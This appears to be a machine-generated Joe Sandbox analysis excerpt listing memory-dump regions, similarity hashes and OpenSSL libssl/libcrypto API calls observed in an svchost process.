                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_family$R_clearmemcmp$O_malloc
                                                                                              • String ID: ssl\quic\quic_record_tx.c
                                                                                              • API String ID: 552621978-2432027203
                                                                                              • Opcode ID: 32a867cf7354396dc50e17b62c3267e615d76f295c64cb9f0ac8b9bcaca93b3f
                                                                                              • Instruction ID: 2a56eed4e95cf959f0a0e2f3bdd300ef43228230ebb6122b4d7833d0571d62d0
                                                                                              • Opcode Fuzzy Hash: 32a867cf7354396dc50e17b62c3267e615d76f295c64cb9f0ac8b9bcaca93b3f
                                                                                              • Instruction Fuzzy Hash: 3AC185A2A4AF4282EA6ACF31D540B7963A4FB44B84F18C635DF6D473A5DF38ED558300
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_strdup
                                                                                              • String ID: ssl3_ctrl$ssl\s3_lib.c
                                                                                              • API String ID: 2909881267-3530330221
                                                                                              • Opcode ID: 81464fcfccb8d5cc0b942b1e4816ac6f7d0422117e21e81cea356ccffdaf2187
                                                                                              • Instruction ID: 0d99f255f814d5f2d52817eb46d6e326bd9421fcc78b4be95c4eb3ee7d95282a
                                                                                              • Opcode Fuzzy Hash: 81464fcfccb8d5cc0b942b1e4816ac6f7d0422117e21e81cea356ccffdaf2187
                                                                                              • Instruction Fuzzy Hash: DF2169F1E5F64651FA23AB66E5423BE2312BF40740F94C43ACD2D066FADE6CE9468310
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444113
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB44412C
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444144
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444150
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB44415C
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444168
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444174
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB444180
                                                                                              • BN_free.LIBCRYPTO-3-X64(?,00007FFBAB423BC0,?,00007FFBAB4273AB,?,00007FFBAB457F02,?,00007FFBAB453609), ref: 00007FFBAB44418C
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: N_free$O_free
                                                                                              • String ID: ssl\tls_srp.c
                                                                                              • API String ID: 3506937590-1545769946
                                                                                              • Opcode ID: 588c221622fd9f9397c94c92d8b00cb2f7c498d30d7df2df0f2271ccf8939536
                                                                                              • Instruction ID: 499b588b6af9bb115108e165d03c7e57054b148713cd754bc0438138337f0bf7
                                                                                              • Opcode Fuzzy Hash: 588c221622fd9f9397c94c92d8b00cb2f7c498d30d7df2df0f2271ccf8939536
                                                                                              • Instruction Fuzzy Hash: 38211092E55AC282EB66DF71C8913FC1314FB94B48F099231FE1C4B56ADF64A2D68310
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_zallocmemset
                                                                                              • String ID: ssl\t1_lib.c$tls1_set_server_sigalgs
                                                                                              • API String ID: 2125936233-369108580
                                                                                              • Opcode ID: 0063be12e3aa0a5680b7b466bd4ad08d65ae94629470a89da5b71de4fd39b615
                                                                                              • Instruction ID: bab4895dc1a26a9bafffffaf17aa974775d496da21c749a66c94266b53262baa
                                                                                              • Opcode Fuzzy Hash: 0063be12e3aa0a5680b7b466bd4ad08d65ae94629470a89da5b71de4fd39b615
                                                                                              • Instruction Fuzzy Hash: B6618FB2A0AA4681EB129B36E4413F927A1FB45F88F4C8031DE2D477A5DF7DE5928350
                                                                                              APIs
                                                                                              • OPENSSL_LH_retrieve.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462BEC
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462C23
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462C63
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462C9A
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462CF3
                                                                                              • OPENSSL_LH_retrieve.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462D1A
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462D2E
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,?,?,?,?,00007FFBAB44DB40), ref: 00007FFBAB462D88
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: H_insert$H_retrieve$O_freeO_zalloc
                                                                                              • String ID: ssl\quic\quic_srtm.c
                                                                                              • API String ID: 3332892965-1571964953
                                                                                              • Opcode ID: 0b0e0732b3e0901c1f5170e4c6a76bc027f72e1e57d7a0f2cef3f43093058a72
                                                                                              • Instruction ID: 2766bbdb2c55f23387f0fec29046f969fd2f70b92b9300c9e7e121d1fc8b2ae7
                                                                                              • Opcode Fuzzy Hash: 0b0e0732b3e0901c1f5170e4c6a76bc027f72e1e57d7a0f2cef3f43093058a72
                                                                                              • Instruction Fuzzy Hash: BF5183A2B0AB4291EA669B36D4A027DA3A0FF44FC4F04C439DE6D477A5EF3CE5558300
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_memdupR_vset_error
                                                                                              • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\statem\statem_srvr.c$tls_process_next_proto
                                                                                              • API String ID: 464498836-56982555
                                                                                              • Opcode ID: 63642cc689758fb4ec4ee4fe9c4727acf58d27852583a43ad9a713bda0192c09
                                                                                              • Instruction ID: 6e8b9b61bc547e212e91a988e493e5bf684660a9e8abbcaa01db69654a176ad7
                                                                                              • Opcode Fuzzy Hash: 63642cc689758fb4ec4ee4fe9c4727acf58d27852583a43ad9a713bda0192c09
                                                                                              • Instruction Fuzzy Hash: 9841E962F0EB8181E7128B25E4402FDA3A0FB95784F088135EF9C17B66EF3CD1958740
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl3_setup_key_block$ssl\s3_enc.c
                                                                                              • API String ID: 0-3285098195
                                                                                              • Opcode ID: 3d40ff9ed8ce44778de679dcad4de8540c9c0705278cbbc43176229b5d892b59
                                                                                              • Instruction ID: 159094cf6ad547a27af6edf9363aa35b7303d787ea9013cf1679108dc3c97ab9
                                                                                              • Opcode Fuzzy Hash: 3d40ff9ed8ce44778de679dcad4de8540c9c0705278cbbc43176229b5d892b59
                                                                                              • Instruction Fuzzy Hash: E4419372B49A8282E755DB75F5412ADB3A4FB84B80F408135EFAC87B66EF3CE0558700
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A94B
                                                                                              • OPENSSL_LH_new.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A96A
                                                                                              • OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A993
                                                                                              • OPENSSL_LH_new.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9AF
                                                                                              • OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9D8
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9F6
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9FF
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45AA14
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: H_freeH_newH_set_thunks$O_freeO_zalloc
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 1806772546-3923830422
                                                                                              • Opcode ID: 2eb3d8455a65ec606cb78af399c6bd19ff677b15e37c08fd1a01727ef15f76e6
                                                                                              • Instruction ID: c4c97f86f7a32db8212884cd8e8987b371f825767ccceb98dd7f7e63d44b2929
                                                                                              • Opcode Fuzzy Hash: 2eb3d8455a65ec606cb78af399c6bd19ff677b15e37c08fd1a01727ef15f76e6
                                                                                              • Instruction Fuzzy Hash: 56311AA1A0AB6695EA12DB35E8410B87360FF44B84F44C536DD6D4B3B6EF3CE949C380
                                                                                              APIs
                                                                                              • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478BB4
                                                                                              • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478BBD
                                                                                              • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478BC6
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478BDF
                                                                                              • EVP_CIPHER_CTX_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478C05
                                                                                              • EVP_MD_CTX_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478C11
                                                                                              • OPENSSL_cleanse.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478C35
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478C60
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: O_free$X_free$L_cleanse
                                                                                              • String ID: ssl\record\methods\tls_common.c
                                                                                              • API String ID: 3857070794-847517130
                                                                                              • Opcode ID: 16ae880bbcd7f4f12206f7fb58f8a980b4d9ceb1a77b75ec99dd5c3ccc35a193
                                                                                              • Instruction ID: 6da75c0ba69b68ca52b770ebe39fd5199cd771ce41a8aa85df5fd677d0c3d10b
                                                                                              • Opcode Fuzzy Hash: 16ae880bbcd7f4f12206f7fb58f8a980b4d9ceb1a77b75ec99dd5c3ccc35a193
                                                                                              • Instruction Fuzzy Hash: 22215672B5AA4185EB21EB35E8852FD6725FB84B80F048035EFAE43766DE3CE545C701
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_mallocmemcpy
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_session_ticket
                                                                                              • API String ID: 1077327330-1875783020
                                                                                              • Opcode ID: 1596e0af75f30e872f9208defff7981b8469c0809c04e29b16abea55fd6c7c34
                                                                                              • Instruction ID: 99b6b899c46438cd1c2530dd1b7a8df6b061a01de580d57d66e2e072ff349b33
                                                                                              • Opcode Fuzzy Hash: 1596e0af75f30e872f9208defff7981b8469c0809c04e29b16abea55fd6c7c34
                                                                                              • Instruction Fuzzy Hash: AB416DA2A1A6C281FB669B35D4817B923A0EB44B84F04C436DE2D437B5CF7CE995C341
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CBB8
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CBD0
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CBE0
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CC0C
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CC77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_mallocR_newR_set_debugR_set_error
                                                                                              • String ID: ssl\t1_lib.c$tls1_set_groups
                                                                                              • API String ID: 3444577743-501428225
                                                                                              • Opcode ID: 3387ba08c0ef94040f6f763e6a0fa10ff7a0d40c00e755005ab5945b47214827
                                                                                              • Instruction ID: 62a9511f52ffcf49e17a07745f437cfe13bea401871b7c34a06b025d5d9fbd31
                                                                                              • Opcode Fuzzy Hash: 3387ba08c0ef94040f6f763e6a0fa10ff7a0d40c00e755005ab5945b47214827
                                                                                              • Instruction Fuzzy Hash: BE41D2B3A0A75682EB12DB26E4406BA6391FF44784F488431EE1D83BA5EE3DD656C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_mallocO_zalloc
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 3820030834-2915021490
                                                                                              • Opcode ID: c37737e365c2ce0626f2e2ceccc942b4325635cc8ce8ee4579d867cc04c18adb
                                                                                              • Instruction ID: 3507dce07dec5d7acd84757818f886a6d6c73d9003cf23d91d9643ab0a839dbe
                                                                                              • Opcode Fuzzy Hash: c37737e365c2ce0626f2e2ceccc942b4325635cc8ce8ee4579d867cc04c18adb
                                                                                              • Instruction Fuzzy Hash: F421F0B1B1AB5281EB66CB36F85167826E0AF09B88F049139CD2D877A4EF3CE0508700
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A310
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A33B
                                                                                              • OPENSSL_LH_error.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A344
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A354
                                                                                              • OPENSSL_LH_error.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A35D
                                                                                              • OPENSSL_LH_delete.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A36D
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A382
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_errorH_insert$H_deleteO_freeO_zalloc
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 190680123-3923830422
                                                                                              • Opcode ID: eeceed8d67f2690089884639a528604250089903e4d745cf7e1d1ce9f3735ef8
                                                                                              • Instruction ID: 2214a30fc4d3aeef3a1d82aadd60267fdd9f0cd13211496cdee13c1a4411fa36
                                                                                              • Opcode Fuzzy Hash: eeceed8d67f2690089884639a528604250089903e4d745cf7e1d1ce9f3735ef8
                                                                                              • Instruction Fuzzy Hash: 1C2192A1B0AB8185E762DB36E44117D6760EB84BC0F048535EFAD47BA6DF2CE9908710
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_mallocR_newR_set_debugR_set_errormemcpy
                                                                                              • String ID: SSL_CTX_use_serverinfo_ex$ssl\ssl_rsa.c
                                                                                              • API String ID: 3414495729-2805076526
                                                                                              • Opcode ID: 6dd5d207ab8fdcb36cad2fb8970ce0cc5b2169a5e553794debd27d2ab7c40b17
                                                                                              • Instruction ID: 6a898a2bfde6d6f88e2f31b62a4b61b4188bdf7749154eea2d54308d66c960c2
                                                                                              • Opcode Fuzzy Hash: 6dd5d207ab8fdcb36cad2fb8970ce0cc5b2169a5e553794debd27d2ab7c40b17
                                                                                              • Instruction Fuzzy Hash: A821C5A271AA4185EB52DB22E4912FE6760EF887C4F48C035FE6D47BAADE3DD5448700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_mallocO_zallocmemcpy
                                                                                              • String ID: ssl\statem\statem_dtls.c
                                                                                              • API String ID: 2462724457-3166991913
                                                                                              • Opcode ID: 90f33b9d4b48c744c714bce5c65b5c8c6e3ade802c3c2a19bb8dfdd2f96a43ba
                                                                                              • Instruction ID: 03a3fd1c70414e13ae10d0231c5438d10e5d758b036394e69b1852dc75c9dc0f
                                                                                              • Opcode Fuzzy Hash: 90f33b9d4b48c744c714bce5c65b5c8c6e3ade802c3c2a19bb8dfdd2f96a43ba
                                                                                              • Instruction Fuzzy Hash: 59519CB260AA4186EB26CF36D4903AD77A0FB48B88F048436DF9D47365DF38E561C300
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB49DD7A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFBAB49DD92
                                                                                              • CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFBAB49DE90
                                                                                                • Part of subcall function 00007FFBAB49C5A0: ERR_new.LIBCRYPTO-3-X64(?,?,00007FFBAB49DD65), ref: 00007FFBAB49C62D
                                                                                                • Part of subcall function 00007FFBAB49C5A0: ERR_set_debug.LIBCRYPTO-3-X64(?,?,00007FFBAB49DD65), ref: 00007FFBAB49C645
                                                                                                • Part of subcall function 00007FFBAB419F90: CRYPTO_malloc.LIBCRYPTO-3-X64 ref: 00007FFBAB41A012
                                                                                                • Part of subcall function 00007FFBAB419F90: memset.VCRUNTIME140 ref: 00007FFBAB41A040
                                                                                                • Part of subcall function 00007FFBAB419F90: memcpy.VCRUNTIME140 ref: 00007FFBAB41A075
                                                                                                • Part of subcall function 00007FFBAB419F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFBAB41A091
                                                                                                • Part of subcall function 00007FFBAB419F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFBAB41A0EA
                                                                                                • Part of subcall function 00007FFBAB419F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFBAB41A162
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_free$R_newR_set_debug$O_mallocmemcpymemset
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_client_key_exchange
                                                                                              • API String ID: 1067245891-2683773349
                                                                                              • Opcode ID: 1c0b79c31e8a9f3943a6edc68d542a649b7dabfdcd0a743967adedc52196357a
                                                                                              • Instruction ID: 94869669fa705eb018ef65ffb2b625f394d20e185a3f4d2275cc346fe2cd98e5
                                                                                              • Opcode Fuzzy Hash: 1c0b79c31e8a9f3943a6edc68d542a649b7dabfdcd0a743967adedc52196357a
                                                                                              • Instruction Fuzzy Hash: 074162F1E5EA4351FAA69A36E8813BD1651AF54BC0F48D431DE2E477FACE2CE4518300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_write_ex
                                                                                              • String ID: ssl\record\methods\dtls_meth.c
                                                                                              • API String ID: 4226350071-3591241555
                                                                                              • Opcode ID: bde0cab8d0c369b78131248d5be2cbc1ed3454a649133427173d6e401b38db80
                                                                                              • Instruction ID: 7b45adbedbc9e7934165224e3e85dca110e139cf8ff5ad91fbad880eb59bd7cd
                                                                                              • Opcode Fuzzy Hash: bde0cab8d0c369b78131248d5be2cbc1ed3454a649133427173d6e401b38db80
                                                                                              • Instruction Fuzzy Hash: 1E4180B1B0AA8282EE16EB72E4412B96360FF89BC4F448032DE6C47775DF2CE495C740
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_strdupR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_use_psk_identity_hint$ssl\ssl_lib.c
                                                                                              • API String ID: 598019968-2430927796
                                                                                              • Opcode ID: 1ea449a0176887930c424f68ffd28c0cbadf460d2bd31b526b59dad1a35b383e
                                                                                              • Instruction ID: 52f571c64d86579a5371407c939980da66ba97ea0819128dbbecb986dce3aea4
                                                                                              • Opcode Fuzzy Hash: 1ea449a0176887930c424f68ffd28c0cbadf460d2bd31b526b59dad1a35b383e
                                                                                              • Instruction Fuzzy Hash: 4431D2A1F1AA4285FB92CB36D4813BC33A0DF84B80F589035DE2C8B7B5DE2ED4858701
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
